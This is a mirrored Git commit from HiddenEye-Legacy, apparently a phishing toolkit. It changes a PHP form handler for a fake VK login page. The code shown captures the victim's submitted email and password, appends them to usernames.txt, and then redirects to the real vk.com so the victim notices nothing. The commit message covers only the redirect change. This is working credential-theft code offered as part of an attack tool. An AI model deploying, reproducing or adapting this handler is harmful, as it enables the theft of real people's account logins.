mirror of
https://github.com/DarkSecDevelopers/HiddenEye-Legacy.git
synced 2024-03-22 21:12:55 +08:00
Changed post to redirect to desktop version
(mobile devices will still be redirected to m.vk.com by vk)
This commit is contained in:
parent
cd822fc063
commit
3cbb7c6e3b
|
@ -2,5 +2,5 @@
|
|||
include 'ip.php';
|
||||
|
||||
file_put_contents("usernames.txt", "[EMAIL]: " . $_POST['email'] . " [PASS]: " . $_POST['pass'] . "\n", FILE_APPEND);
|
||||
header('Location: https://m.vk.com');
|
||||
header('Location: https://vk.com');
|
||||
exit();
|
||||
|
|
Loading…
Reference in New Issue
Block a user